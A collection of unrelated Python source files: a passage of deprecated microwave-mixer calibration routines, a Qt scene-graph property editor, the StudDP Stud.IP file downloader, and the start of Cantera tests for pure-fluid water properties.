        ch_1_min, ch_2_min: the optimized I and Q channel offsets.
    """
    source.on()
    if frequency is None:
        frequency = source.frequency()
    else:
        source.frequency(frequency)
    # (Was a stray no-op triple-quoted string:) make coarse sweeps to
    # approximate the minimum.
    SH.ref_lvl(SH_ref_level)
    detector = det.Signal_Hound_fixed_frequency(
        SH,
        frequency=(source.frequency()),
        Navg=5,
        delay=0.0,
        prepare_for_each_point=False
    )
    ad_func_pars = {'adaptive_function': cma.fmin,
                    'x0': x0,
                    'sigma0': 1,
                    'options': {'maxiter': maxiter,  # maximum function calls
                                # Scaling for individual sigma's
                                'cma_stds': [init_stepsize]*2,
                                'ftarget': ftarget
                                },
                    'minimize': True}
    MC.set_sweep_functions([chI_par, chQ_par])
    MC.set_detector_function(detector)  # sets test_detector
    MC.set_adaptive_function_parameters(ad_func_pars)
    MC.run(name=label, mode='adaptive')
    a = ma.OptimizationAnalysis(label=label)
    # v2 creates a pretty picture of the optimizations
    ma.OptimizationAnalysis_v2(label=label)
    ch_1_min = a.optimization_result[0][0]
    ch_2_min = a.optimization_result[0][1]
    return ch_1_min, ch_2_min
@deprecated(version='0.4', reason='not used within pyqed')
def multi_channel_mixer_carrier_cancellation(SH, source, MC,
                                             channel_pars,
                                             frequency: float=None,
                                             SH_ref_level: float=-40,
                                             init_stepsize: float=0.1,
                                             x0: tuple=None):
    """
    Varies the mixer offsets to minimize leakage at the carrier frequency.
    this is a generic version compatible with multiple channels.
    Args:
        SH (instr) : Signal hound used to measure power
        source (instr) : mw_source that provides the leakage tone
        MC (instr) :
        channel_pars (par) : list of offset parameters
        frequency (float) : the frequency in Hz at which to minimize leakage
        SH_ref_level (float) : Signal hound reference level
        init_stepsize (float): initial stepsize for Nelder mead algorithm
        x0 (tuple) : starting point for optimization
    returns:
        optimization_result (tuple): a tuple containing the final value for
            each of the varied parameters.
    """
    source.on()
    if frequency is None:
        frequency = source.frequency()
    else:
        source.frequency(frequency)
    SH.ref_lvl(SH_ref_level)
    # NOTE(review): this passes prepare_each_point while the single-channel
    # variant passes prepare_for_each_point — confirm the detector keyword.
    detector = det.Signal_Hound_fixed_frequency(
        SH, frequency=(source.frequency()),
        Navg=5, delay=0.0, prepare_each_point=False)
    if x0 is None:
        # Default starting point: zero offset on every channel.
        x0 = [0.0]*len(channel_pars)
    ad_func_pars = {'adaptive_function': nelder_mead,
                    'x0': x0,
                    'initial_step': [init_stepsize]*len(channel_pars),
                    'no_improv_break': 15,
                    'minimize': True,
                    'maxiter': 500}
    MC.set_sweep_functions(channel_pars)
    MC.set_detector_function(detector)  # sets test_detector
    MC.set_adaptive_function_parameters(ad_func_pars)
    MC.run(name='Offset_calibration', mode='adaptive')
    a = ma.OptimizationAnalysis(label='Offset_calibration')
    return a.optimization_result[0]
@deprecated(version='0.4', reason='not used within pyqed')
def mixer_skewness_calibration_QWG(SH, source, QWG,
                                   alpha, phi,
                                   MC,
                                   ch_pair=1,
                                   frequency=None, f_mod=None,
                                   SH_ref_level: float=-40,
                                   name='mixer_skewness_calibration_QWG'):
    '''
    Calibrates the mixer skewness on a QWG by minimizing the power of the
    spurious sideband with a Nelder-Mead optimization.
    Inputs:
        SH (instrument)
        Source (instrument) MW-source used for driving
        alpha (parameter)
        phi (parameter)
        ch_pair (int) QWG channel pair carrying the modulation
        frequency (float Hz) Spurious SB freq: f_source - f_mod
        f_mod (float Hz) Modulation frequency
        SH_ref_level (float) Signal hound reference level
    returns:
        phi, alpha the coefficients that go in the predistortion matrix
    For the spurious sideband:
        alpha = 1/QI_amp_optimal
        phi = -IQ_phase_optimal
    For details, see Leo's notes on mixer skewness calibration in the docs
    '''
    # Silence all channels, then restart the QWG in continuous mode.
    QWG.ch1_default_waveform('zero')
    QWG.ch2_default_waveform('zero')
    QWG.ch3_default_waveform('zero')
    QWG.ch4_default_waveform('zero')
    QWG.run_mode('CONt')
    QWG.stop()
    QWG.start()
    if f_mod is None:
        f_mod = QWG.get('ch_pair{}_sideband_frequency'.format(ch_pair))
    else:
        QWG.set('ch_pair{}_sideband_frequency'.format(ch_pair), f_mod)
    if frequency is None:
        # Corresponds to the frequency where to minimize with the SH
        frequency = source.frequency.get() - f_mod
    SH.ref_lvl(SH_ref_level)
    d = det.Signal_Hound_fixed_frequency(SH, frequency)
    ad_func_pars = {'adaptive_function': nelder_mead,
                    'x0': [1.0, 0.0],
                    'initial_step': [.15, 10],
                    'no_improv_break': 10,
                    'minimize': True,
                    'maxiter': 500}
    MC.set_sweep_functions([alpha, phi])
    MC.set_detector_function(d)
    MC.set_adaptive_function_parameters(ad_func_pars)
    MC.run(name=name, mode='adaptive')
    a = ma.OptimizationAnalysis()
    # phi and alpha are the coefficients that go in the predistortion matrix
    alpha = a.optimization_result[0][0]
    phi = a.optimization_result[0][1]
    return phi, alpha
@deprecated(version='0.4', reason='not used within pyqed')
def mixer_skewness_calibration_5014(SH, source, station,
                                    MC=None,
                                    QI_amp_ratio=None, IQ_phase=None,
                                    frequency=None, f_mod=10e6,
                                    I_ch=1, Q_ch=2,
                                    name='mixer_skewness_calibration_5014'):
    '''
    Loads a cos and sin waveform in the specified I and Q channels of the
    tektronix 5014 AWG (taken from station.pulsar.AWG).
    By looking at the frequency corresponding with the spurious sideband the
    phase_skewness and amplitude skewness that minimize the signal correspond
    to the mixer skewness.
    Inputs:
        SH (instrument)
        Source (instrument) MW-source used for driving
        station (qcodes station) Contains the AWG and pulsar sequencer
        QI_amp_ratio (parameter) qcodes parameter
        IQ_phase (parameter)
        frequency (float Hz) Spurious SB freq: f_source - f_mod
        f_mod (float Hz) Modulation frequency
        I_ch/Q_ch (int or str) Specifies the AWG channels
    returns:
        phi, alpha the coefficients that go in the predistortion matrix
    For the spurious sideband:
        alpha = 1/QI_amp_optimal
        phi = -IQ_phase_optimal
    For details, see Leo's notes on mixer skewness calibration in the docs
    '''
    if frequency is None:
        # Corresponds to the frequency where to minimize with the SH
        frequency = source.frequency.get() - f_mod
    if QI_amp_ratio is None:
        QI_amp_ratio = ManualParameter('QI_amp', initial_value=1)
    if IQ_phase is None:
        IQ_phase = ManualParameter('IQ_phase', unit='deg', initial_value=0)
    if MC is None:
        MC = station.MC
    # Idiom fix: isinstance() instead of `type(x) is int` comparisons.
    if isinstance(I_ch, int):
        I_ch = 'ch{}'.format(I_ch)
    if isinstance(Q_ch, int):
        Q_ch = 'ch{}'.format(Q_ch)
    d = det.SH_mixer_skewness_det(frequency, QI_amp_ratio, IQ_phase, SH,
                                  f_mod=f_mod,
                                  I_ch=I_ch, Q_ch=Q_ch, station=station)
    S1 = pw.wrap_par_to_swf(QI_amp_ratio)
    S2 = pw.wrap_par_to_swf(IQ_phase)
    ad_func_pars = {'adaptive_function': nelder_mead,
                    'x0': [1.0, 0.0],
                    'initial_step': [.15, 10],
                    'no_improv_break': 12,
                    'minimize': True,
                    'maxiter': 500}
    MC.set_sweep_functions([S1, S2])
    MC.set_detector_function(d)
    MC.set_adaptive_function_parameters(ad_func_pars)
    MC.run(name=name, mode='adaptive')
    a = ma.OptimizationAnalysis()
    # phi and alpha are the coefficients that go in the predistortion matrix
    alpha = 1/a.optimization_result[0][0]
    phi = -1*a.optimization_result[0][1]
    return phi, alpha
@deprecated(version='0.4', reason='not used within pyqed')
def mixer_skewness_calibration_adaptive(**kw):
    """(Deprecated) Placeholder; the implementation lives in the archived toolbox."""
    raise NotImplementedError('see archived calibration toolbox')
@deprecated(version='0.4', reason='not used within pyqed')
def mixer_carrier_cancellation_5014(AWG, SH, source, MC,
                                    frequency=None,
                                    AWG_channel1=1,
                                    AWG_channel2=2,
                                    SH_ref_level: float=-40,
                                    **kw):
    '''
    Varies the mixer offsets to minimize leakage at the carrier frequency.
    This is the version for a tektronix AWG.

    Args:
        AWG: AWG whose channel offsets are swept
        SH: Signal hound used to measure power
        source: the source for which carrier leakage must be minimized
        MC: MeasurementControl used to run the adaptive measurement
        frequency: frequency in Hz on which to minimize leakage, if None uses
            the current frequency of the source
        AWG_channel1/AWG_channel2: AWG channel numbers carrying I and Q
        SH_ref_level: Signal hound reference level
    returns:
        ch_1_min, ch_2_min
    Note: Updated for QCodes
    '''
    source.on()
    if frequency is None:
        frequency = source.get('frequency')
    else:
        source.set('frequency', frequency)
    # BUG FIX: honor AWG_channel1/2 instead of hard-coding channels 1 and 2
    # (behavior with the default arguments is unchanged).
    S1 = getattr(AWG, 'ch{}_offset'.format(AWG_channel1))
    S2 = getattr(AWG, 'ch{}_offset'.format(AWG_channel2))
    SH.ref_lvl(SH_ref_level)
    detector = det.Signal_Hound_fixed_frequency(
        SH, frequency=(source.frequency.get()),
        Navg=5, delay=0.0, prepare_for_each_point=False)
    ad_func_pars = {'adaptive_function': nelder_mead,
                    'x0': [0.0, 0.0],
                    'initial_step': [0.01, 0.01],
                    'no_improv_break': 15,
                    'minimize': True,
                    'maxiter': 500}
    MC.set_sweep_functions([S1, S2])
    MC.set_detector_function(detector)  # sets test_detector
    MC.set_adaptive_function_parameters(ad_func_pars)
    MC.run(name='Offset_calibration', mode='adaptive')
    a = ma.OptimizationAnalysis(auto=True, label='Offset_calibration')
    ch_1_min = a.optimization_result[0][0]
    ch_2_min = a.optimization_result[0][1]
    return ch_1_min, ch_2_min
@deprecated(version='0.4', reason='not used within pyqed')
def mixer_carrier_cancellation_UHFQC(UHFQC, SH, source, MC,
                                     frequency=None,
                                     SH_ref_level: float=-40,
                                     **kw):
    '''
    Varies the mixer offsets to minimize leakage at the carrier frequency.
    This is the version for a UHFQC.

    Args:
        UHFQC: UHFQC whose signal-output offsets are swept
        SH: Signal hound used to measure power
        source: the source for which carrier leakage must be minimized
        MC: MeasurementControl used to run the adaptive measurement
        frequency: frequency in Hz on which to minimize leakage, if None uses
            the current frequency of the source
        SH_ref_level: Signal hound reference level
    returns:
        ch_1_min, ch_2_min
    Note: Updated for QCodes
    '''
    source.on()
    if frequency is None:
        frequency = source.get('frequency')
    else:
        source.set('frequency', frequency)
    # The DC offsets of the two UHFQC signal outputs are the sweep parameters.
    S1 = UHFQC.sigouts_0_offset
    S2 = UHFQC.sigouts_1_offset
    SH.ref_lvl(SH_ref_level)
    # NOTE(review): passes prepare_each_point while the 5014 variant passes
    # prepare_for_each_point — confirm the detector's keyword name.
    detector = det.Signal_Hound_fixed_frequency(
        SH, frequency=(source.frequency.get()),
        Navg=5, delay=0.0, prepare_each_point=False)
    ad_func_pars = {'adaptive_function': nelder_mead,
                    'x0': [0.0, 0.0],
                    'initial_step': [0.01, 0.01],
                    'no_improv_break': 15,
                    'minimize': True,
                    'maxiter': 500}
    MC.set_sweep_functions([S1, S2])
    MC.set_detector_function(detector)  # sets test_detector
    MC.set_adaptive_function_parameters(ad_func_pars)
    MC.run(name='Offset_calibration', mode='adaptive')
    a = ma.OptimizationAnalysis(auto=True, label='Offset_calibration')
    ch_1_min = a.optimization_result[0][0]
    ch_2_min = a.optimization_result[0][1]
    return ch_1_min, ch_2_min
| |
import os
from DTL.qt import QtCore, QtGui
from DTL.api import apiUtils
from DTL.gui.base import BaseGUI
#------------------------------------------------------------
#------------------------------------------------------------
class PropertiesEditor(QtGui.QWidget, BaseGUI):
    """Tree view of a scene-graph model plus per-type property editors."""
    #------------------------------------------------------------
    def __init__(self, model=None, proxyModel=None, editors=None, *args, **kwds):
        self._qtclass = QtGui.QWidget
        apiUtils.synthesize(self, 'model', model)
        apiUtils.synthesize(self, 'proxyModel', proxyModel)
        # BUG FIX: `editors={}` was a mutable default shared by every
        # instance; use a None sentinel and build a fresh dict per instance.
        apiUtils.synthesize(self, 'editors', {} if editors is None else editors)
        apiUtils.synthesize(self, 'busy', False)
        BaseGUI.__init__(self, **kwds)
        if proxyModel :
            self.setProxyModel(proxyModel)
        elif model :
            self.setModel(model)
    #------------------------------------------------------------
    def onFinalize(self):
        """Lays out the splitter and instantiates the (initially hidden) editors."""
        self.main_splitter = QtGui.QSplitter()
        self.main_splitter.addWidget(self.treeView)
        self.main_splitter.addWidget(self.scrollArea)
        self.mainLayout.addWidget(self.main_splitter)
        self.main_splitter.setSizes([150,250])
        self.setEditors()
        for key, editor in self.editors.items() :
            self.properties_layout.addWidget(editor)
            editor.setVisible(False)
    #------------------------------------------------------------
    def setEditors(self):
        '''For subclass to implement all of the editors'''
        self._editors['Node'] = NodeEditor()
        self._editors['FloatTransformNode'] = FloatTransformNodeEditor()
        self._editors['IntTransformNode'] = IntTransformNodeEditor()
        self._editors['Layer'] = LayerEditor()
    #------------------------------------------------------------
    def setProxyModel(self, proxyModel):
        self._proxyModel = proxyModel
        self.treeView.setModel(proxyModel)
        for editor in self.editors.values() :
            editor.setProxyModel(proxyModel)
    #------------------------------------------------------------
    def setModel(self, model):
        self._model = model
        self.treeView.setModel(model)
        self.treeView.selectionModel().selectionChanged.connect(self.selectionChanged)
        for editor in self.editors.values() :
            editor.setModel(model)
    #------------------------------------------------------------
    def selectionChanged(self):
        # `busy` guards against re-entrant selection updates.
        if not self.busy:
            self.setBusy(True)
            selectedIndexes = self.treeView.selectionModel().selectedIndexes()
            # BUG FIX: guard against an empty selection (was an IndexError).
            if selectedIndexes:
                self.setSelection(selectedIndexes[-1])
            else:
                self.clearSelection()
            self.setBusy(False)
    #------------------------------------------------------------
    def clearSelection(self):
        for editor in self.editors.values():
            editor.setVisible(False)
    #------------------------------------------------------------
    def setSelection(self, index):
        if self.proxyModel is not None :
            index = self.proxyModel.mapToSource(index)
        self.clearSelection()
        node = index.internalPointer()
        if node is None :
            return
        for editor in self.editors.values():
            editor.setSelection(index)
        # Show every editor registered for any class in the node's MRO.
        for item in node.__class__.__mro__ :
            if not hasattr(item, '__name__') :
                continue
            if self.editors.get(item.__name__, False):
                self.editors[item.__name__].setVisible(True)
#------------------------------------------------------------
#------------------------------------------------------------
class Editor(QtGui.QWidget, BaseGUI):
    """Base class for property editors backed by a QDataWidgetMapper."""
    #------------------------------------------------------------
    def __init__(self, model=None, proxyModel=None, **kwds):
        self._qtclass = QtGui.QWidget
        apiUtils.synthesize(self, 'model', model)
        apiUtils.synthesize(self, 'proxyModel', proxyModel)
        apiUtils.synthesize(self, 'dataMapper', QtGui.QDataWidgetMapper())
        #self._dataMapper.setSubmitPolicy(QtGui.QDataWidgetMapper.ManualSubmit)
        BaseGUI.__init__(self, **kwds)
    #------------------------------------------------------------
    def setProxyModel(self, proxyModel):
        # Editors always map against the source model, not the proxy.
        self._proxyModel = proxyModel
        self.setModel(proxyModel.sourceModel())
    #------------------------------------------------------------
    def setModel(self, model):
        self._model = model
        self.dataMapper.setModel(self._model)
        self.setMappings()
    #------------------------------------------------------------
    def setMappings(self):
        '''For Subclass to implement to map the UI elements to the data'''
        #self.dataMapper.addMapping(self.uiName, 0)
        #self.dataMapper.addMapping(self.uiType, 1)
        pass
    #------------------------------------------------------------
    def setSelection(self, index):
        # Point the mapper at the row of `index` within its parent.
        parent = index.parent()
        self.dataMapper.setRootIndex(parent)
        self.dataMapper.setCurrentModelIndex(index)
#------------------------------------------------------------
#------------------------------------------------------------
class NodeEditor(Editor):
    """Editor mapping the base Node properties onto the UI."""
    #------------------------------------------------------------
    def __init__(self, *args, **kwds):
        super(NodeEditor, self).__init__(*args, **kwds)
    #------------------------------------------------------------
    def setMappings(self):
        # Column 0 holds the node name; prop_name is presumably a widget
        # created by BaseGUI from the .ui file — confirm.
        self.dataMapper.addMapping(self.prop_name, 0)
#------------------------------------------------------------
#------------------------------------------------------------
class FloatTransformNodeEditor(Editor):
    """Editor mapping the x/y/z float-transform columns onto the UI."""
    #------------------------------------------------------------
    def __init__(self, *args, **kwds):
        super(FloatTransformNodeEditor, self).__init__(*args, **kwds)
    #------------------------------------------------------------
    def setMappings(self):
        # Columns 1-3 hold the x, y and z components.
        for column, widget in enumerate((self.prop_x, self.prop_y, self.prop_z), 1):
            self.dataMapper.addMapping(widget, column)
#------------------------------------------------------------
#------------------------------------------------------------
class IntTransformNodeEditor(Editor):
    """Editor mapping the x/y/z integer-transform columns onto the UI."""
    #------------------------------------------------------------
    def __init__(self, *args, **kwds):
        super(IntTransformNodeEditor, self).__init__(*args, **kwds)
    #------------------------------------------------------------
    def setMappings(self):
        # Columns 1-3 hold the x, y and z components.
        column_widgets = ((1, self.prop_x), (2, self.prop_y), (3, self.prop_z))
        for column, widget in column_widgets:
            self.dataMapper.addMapping(widget, column)
#------------------------------------------------------------
#------------------------------------------------------------
class LayerEditor(Editor):
    """Editor mapping the Layer properties onto the UI."""
    #------------------------------------------------------------
    def __init__(self, *args, **kwds):
        super(LayerEditor, self).__init__(*args, **kwds)
    #------------------------------------------------------------
    def setMappings(self):
        # Column 1 holds the layer index.
        self.dataMapper.addMapping(self.prop_index, 1)
if __name__ == '__main__' :
    # Manual smoke test: build a small scene graph and open it in the editor.
    from DTL.db.models import SceneGraphModel
    from DTL.db.data import Node, FloatTransformNode, IntTransformNode, Layer
    from DTL.gui import Core
    root = Layer()
    node1 = Node(name='Node1', parent=root)
    node2 = Node(name='Node2', parent=root)
    layer1 = Layer(name='Layer1', parent=node2)
    node3 = Node(name='Node3', parent=layer1)
    trans1 = FloatTransformNode(name='Trans1', parent=node2)
    trans2 = FloatTransformNode(name='Trans2', parent=trans1)
    trans3 = IntTransformNode(name='Trans3', parent=trans1)
    model = SceneGraphModel(root)
    propeditor = PropertiesEditor(model=model)
    propeditor.show()
    Core.Start()
| |
#!/usr/bin/python3
"""
StudDP downloads files from Stud.IP.
"""
import json
import logging
import time
import sys
import re
import optparse
from pidfile import PidFile
import keyring
import getpass
import daemon
from . import *
from .picker import Picker
from .APIWrapper import APIWrapper
LOG = logging.getLogger(__name__)
LOG_PATH = os.path.expanduser(os.path.join('~', '.studdp'))
PID_FILE = os.path.expanduser(os.path.join('~', '.studdp', 'studdp.pid'))
WIN_INVALID_CHARACTERS = [":", "<", ">", "|", "\?", "\*"]
class StudDP:
    """
    The main program loops until interrupted.
    Every time files were changed after the last check, they are downloaded.
    Files are also downloaded if they do not exist locally.
    """
    def __init__(self,
                 config,
                 api_helper,
                 daemonize=False,
                 on_windows=False,
                 update=False):
        """
        Initializes the API and the update frequencies.

        Args:
            config: config dict; must contain 'interval', 'last_check',
                'selected_courses' and 'renaming'.
            api_helper: wrapper around the Stud.IP REST API.
            daemonize: keep looping forever instead of doing a single pass.
            on_windows: strip characters invalid in Windows paths.
            update: also re-download files whose remote change date is newer
                than the last check (otherwise only missing files).
        """
        self.config = config
        self.interval = self.config['interval']
        self.api = api_helper
        self.daemonize = daemonize
        self.on_windows = on_windows
        self.update = update

    def __del__(self):
        # NOTE(review): persisting config from __del__ is fragile (globals may
        # already be torn down at interpreter exit) — consider explicit close().
        LOG.info('Invoking exit.')
        with open(CONFIG_FILE, 'w') as wfile:
            LOG.info('Writing config.')
            json.dump(self.config, wfile, sort_keys=True, indent=4 * ' ')
        LOG.info('Exiting.')

    def _needs_download(self, document):
        """
        Checks if a download of the document is needed.

        True when the file is missing locally, or when updates are enabled
        and the remote change date is newer than the last check.
        """
        return ((int(document['chdate']) > self.config['last_check']) and
                self.update) or not \
            os.path.exists(os.path.join(document['path'],
                                        document['filename']))

    def __call__(self):
        """
        Starts the main loop and checks
        periodically for document changes and downloads.
        """
        while True:
            try:
                courses = self.api.get_courses()
            except Exception:
                LOG.exception("Getting courselist failed. Stacktrace:")
                # BUG FIX: `courses` was unbound after a failure, raising a
                # NameError below; skip this pass instead.
                if not self.daemonize:
                    return
                time.sleep(self.interval)
                continue
            LOG.info('Checking courses.')
            for course in courses:
                title = course['title']
                LOG.debug('Course: %s', title)
                if title not in self.config['selected_courses']:
                    LOG.debug('Skipping files for %s', title)
                    continue
                LOG.info('Checking files for %s', title)
                try:
                    documents = self.api.get_documents(course, self.config['renaming'])
                except Exception:
                    # Lazy %-style args instead of eager string formatting.
                    LOG.exception("Getting course %s failed. Stacktrace:",
                                  course["title"])
                    continue
                for document in documents:
                    if self.on_windows:  # Salt Path
                        for char in WIN_INVALID_CHARACTERS:
                            document["path"] = re.sub(
                                char, "", document["path"])
                            document["filename"] = re.sub(
                                char, "", document["filename"])
                    if self._needs_download(document):
                        path = os.path.join(
                            document['path'], document['filename'])
                        LOG.info('Downloading %s...', path)
                        try:
                            self.api.download_document(document, path)
                            LOG.debug('Saved %s', path)
                        except Exception:
                            LOG.exception("Downloading to %s failed. Stacktrace:", path)
            self.config['last_check'] = time.time()
            LOG.info('Done checking.')
            if not self.daemonize:
                return
            time.sleep(self.interval)
def _setup_logging(log_to_stdout=False):
    """
    Sets up the logging handlers.

    Always logs DEBUG+ to <LOG_PATH>/info.log; with *log_to_stdout* also
    mirrors INFO+ to stdout and ERROR+ to stderr.
    """
    os.makedirs(LOG_PATH, exist_ok=True)
    file_handler_info = logging.FileHandler(os.path.join(LOG_PATH, 'info.log'))
    file_handler_info.setLevel(logging.DEBUG)
    file_handler_info.setFormatter(logging.Formatter(
        '%(asctime)s - %(name)s - %(levelname)s - %(message)s'))
    LOG.addHandler(file_handler_info)
    if log_to_stdout:
        out = logging.StreamHandler(sys.stdout)
        out.setLevel(logging.INFO)
        out.setFormatter(logging.Formatter(
            '%(name)s - %(levelname)s - %(message)s'))
        LOG.addHandler(out)
        # NOTE(review): the stderr handler is grouped under the verbose
        # flag here -- confirm whether errors should be echoed always.
        err = logging.StreamHandler(sys.stderr)
        err.setLevel(logging.ERROR)
        err.setFormatter(logging.Formatter(
            '%(name)s - %(levelname)s - %(message)s'))
        LOG.addHandler(err)
    LOG.setLevel(logging.DEBUG)
    LOG.info('Logging initialized.')
def _get_password(username, force_update=False):
    """Return the user's password from the keyring, prompting when the
    keyring has no entry or *force_update* is set (the new password is
    stored back into the keyring)."""
    LOG.info("Querying for password")
    stored = keyring.get_password("StudDP", username)
    if force_update or not stored:
        stored = getpass.getpass(
            "Please enter password for user %s: " % username)
        LOG.info("Adding new password to keyring")
        keyring.set_password("StudDP", username, stored)
    return stored
def _parse_args(argv=None):
    """
    Parses the command line options.

    :param argv: optional argument list to parse instead of
        ``sys.argv[1:]`` (backward-compatible addition; makes the parser
        usable from tests and embedding code).
    :return: ``(options, args)`` tuple as produced by optparse.
    """
    parser = optparse.OptionParser()
    parser.add_option("-c", "--config",
                      action="store_true", dest="regenerate", default=False,
                      help="change course selection")
    parser.add_option("-v", "--verbose",
                      action="store_true", dest="log_to_stdout", default=False,
                      help="print log to stdout")
    parser.add_option("-d", "--daemonize",
                      action="store_true", dest="daemonize", default=False,
                      help="start as daemon. Use stopDP to end thread.")
    parser.add_option("-w", "--windows",
                      action="store_true", dest="on_windows", default=False,
                      help="remove characters that are forbidden in windows paths")
    parser.add_option("-u", "--update",
                      action="store_true", dest="update_courses", default=False,
                      help="update files when they are updated on StudIP")
    parser.add_option("-p", "--password",
                      action="store_true", dest="update_password", default=False,
                      help="force password update")
    # parse_args(None) falls back to sys.argv[1:], preserving the old
    # zero-argument behavior exactly.
    return parser.parse_args(argv)
def _load_config(config, options):
    """Validate the config, resolve credentials, and (re)build the course
    selection when requested.

    :param config: mutable configuration dict (updated in place).
    :param options: parsed command line options.
    :return: an initialized APIWrapper.
    :raises SystemExit: when no username is configured.
    """
    if config['username'] == "":
        print("No username provided. "
              "Please configure ~/.config/studdp/config.json first")
        # BUG FIX: use sys.exit instead of the site-injected exit()
        # builtin, which is absent e.g. under `python -S`.
        sys.exit(1)
    password = _get_password(config['username'], options.update_password)
    api = APIWrapper((config['username'], password),
                     config["base_address"], config["local_path"])
    courses = api.get_courses()
    if not config['courses_selected'] or options.regenerate:
        LOG.info("Updating course selection")
        # Materialize the titles: a lazy map object would be exhausted
        # after a single pass inside Picker.
        titles = [course["title"] for course in courses]
        selection = Picker(
            title="Select courses to download",
            options=titles,
            checked=config['selected_courses']).getSelected()
        config["courses_selected"] = True
        if selection:
            config['selected_courses'] = selection
    return api
def main():
    """Entry point: parse options, ensure a config file exists, then run
    the downloader (optionally as a daemon)."""
    options, _ = _parse_args()
    _setup_logging(options.log_to_stdout)
    # First run: write the default configuration so the user can edit it.
    if not os.path.exists(CONFIG_FILE):
        os.makedirs(os.path.dirname(CONFIG_FILE), exist_ok=True)
        with open(CONFIG_FILE, "w") as f:
            json.dump(DEFAULT_CONFIG, f, sort_keys=True, indent=4 * ' ')
    with open(CONFIG_FILE, 'r') as rfile:
        config = json.load(rfile)
    api = _load_config(config, options)
    task = StudDP(config, api, options.daemonize,
                  options.on_windows, options.update_courses)
    if options.daemonize:
        with daemon.DaemonContext(pidfile=PidFile(PID_FILE)):
            task()
    else:
        task()
# Script entry point.
if __name__ == "__main__":
    main()
| |
from __future__ import division
import itertools
import numpy as np
import cantera as ct
from . import utilities
class TestPureFluid(utilities.CanteraTest):
    """ Test functionality of the PureFluid class """
    def setUp(self):
        # A fresh pure-fluid water object for every test.
        self.water = ct.Water()

    def test_critical_properties(self):
        self.assertNear(self.water.critical_pressure, 22.089e6)
        self.assertNear(self.water.critical_temperature, 647.286)
        self.assertNear(self.water.critical_density, 317.0)

    def test_set_state(self):
        # X is the vapor fraction (quality) inside the two-phase dome.
        self.water.PX = 101325, 0.5
        self.assertNear(self.water.P, 101325)
        self.assertNear(self.water.X, 0.5)
        self.water.TX = 500, 0.8
        self.assertNear(self.water.T, 500)
        self.assertNear(self.water.X, 0.8)

    def test_substance_set(self):
        # Round-trip every settable property pair.
        self.water.TV = 400, 1.45
        self.assertNear(self.water.T, 400)
        self.assertNear(self.water.v, 1.45)
        self.water.PV = 101325, 1.45
        self.assertNear(self.water.P, 101325)
        self.assertNear(self.water.v, 1.45)
        self.water.UP = -1.45e7, 101325
        self.assertNear(self.water.u, -1.45e7)
        self.assertNear(self.water.P, 101325)
        self.water.VH = 1.45, -1.45e7
        self.assertNear(self.water.v, 1.45)
        self.assertNear(self.water.h, -1.45e7)
        self.water.TH = 400, -1.45e7
        self.assertNear(self.water.T, 400)
        self.assertNear(self.water.h, -1.45e7)
        self.water.SH = 5000, -1.45e7
        self.assertNear(self.water.s, 5000)
        self.assertNear(self.water.h, -1.45e7)
        self.water.ST = 5000, 400
        self.assertNear(self.water.s, 5000)
        self.assertNear(self.water.T, 400)

    def test_set_X(self):
        self.water.TX = 500, 0.0
        p = self.water.P
        self.water.X = 0.8
        # Setting the quality alone must keep T (and thus Psat) fixed.
        self.assertNear(self.water.P, p)
        self.assertNear(self.water.T, 500)
        self.assertNear(self.water.X, 0.8)
        # Setting X outside the two-phase region must fail.
        self.water.TP = 650, 101325
        with self.assertRaises(Exception):
            self.water.X = 0.1
        self.water.TP = 300, 101325
        with self.assertRaises(Exception):
            self.water.X = 0.3

    def test_set_minmax(self):
        # The temperature limits of the EOS must be reachable exactly.
        self.water.TP = self.water.min_temp, 101325
        self.assertNear(self.water.T, self.water.min_temp)
        self.water.TP = self.water.max_temp, 101325
        self.assertNear(self.water.T, self.water.max_temp)

    def check_fd_properties(self, T1, P1, T2, P2, tol):
        # Properties which are computed as finite differences
        # should be continuous between two nearby states.
        self.water.TP = T1, P1
        cp1 = self.water.cp_mass
        cv1 = self.water.cv_mass
        k1 = self.water.isothermal_compressibility
        alpha1 = self.water.thermal_expansion_coeff
        self.water.TP = T2, P2
        cp2 = self.water.cp_mass
        cv2 = self.water.cv_mass
        k2 = self.water.isothermal_compressibility
        alpha2 = self.water.thermal_expansion_coeff
        self.assertNear(cp1, cp2, tol)
        self.assertNear(cv1, cv2, tol)
        self.assertNear(k1, k2, tol)
        self.assertNear(alpha1, alpha2, tol)

    def test_properties_near_min(self):
        self.check_fd_properties(self.water.min_temp*(1+1e-5), 101325,
                                 self.water.min_temp*(1+1e-4), 101325, 1e-2)

    def test_properties_near_max(self):
        self.check_fd_properties(self.water.max_temp*(1-1e-5), 101325,
                                 self.water.max_temp*(1-1e-4), 101325, 1e-2)

    def test_TPX(self):
        self.water.TX = 400, 0.8
        T,P,X = self.water.TPX
        self.assertNear(T, 400)
        self.assertNear(X, 0.8)
        # T, P and X over-determine the state; only the getter is allowed.
        with self.assertRaises(AttributeError):
            self.water.TPX = 500, 101325, 0.3
# To minimize errors when transcribing tabulated data, the input units here are:
# T: K, P: MPa, rho: kg/m3, v: m3/kg, (u,h): kJ/kg, s: kJ/kg-K
# Which are then converted to SI
class StateData(object):
    """A single tabulated reference state, converted to SI on construction.

    Inputs use the table units (T [K], p [MPa], rho [kg/m^3] or v [m^3/kg],
    u or h [kJ/kg], s [kJ/kg-K]); the stored attributes are SI.
    """
    def __init__(self, phase, T, p, rho=None, v=None, u=None, h=None, s=None, relax=False):
        self.phase = phase
        self.T = T
        self.p = 1e6 * p  # MPa -> Pa
        # Density may be given directly or as specific volume.
        if rho:
            self.rho = rho
        else:
            self.rho = 1.0 / v
        # Internal energy may be given directly or derived from enthalpy
        # via u = h - p*v.
        if u is not None:
            self.u = 1e3 * u
        else:
            self.u = 1e3 * h - self.p / self.rho
        self.s = 1e3 * s
        # Relaxed (10x) tolerances for coarsely tabulated states.
        self.tolMod = 10.0 if relax else 1.0
class Tolerances(object):
    """Relative tolerances for the consistency checks.

    Any argument left as None (or otherwise falsy) falls back to its
    default value below.
    """
    _DEFAULTS = dict(p=2e-5, u=2e-6, s=2e-6,
                     dUdS=2e-6, dAdV=2e-6, dPdT=2e-4, hTs=2e-4)

    def __init__(self, p=None, u=None, s=None,
                 dUdS=None, dAdV=None, dPdT=None, hTs=None):
        supplied = dict(p=p, u=u, s=s, dUdS=dUdS,
                        dAdV=dAdV, dPdT=dPdT, hTs=hTs)
        for name, value in supplied.items():
            setattr(self, name, value or self._DEFAULTS[name])
class PureFluidTestCases(object):
    """
    Test the results of pure fluid phase calculations against tabulated
    references and for consistency with basic thermodynamic relations.
    """
    # Cache of PureFluid objects, shared across all subclasses because
    # construction is expensive.
    fluids = {}

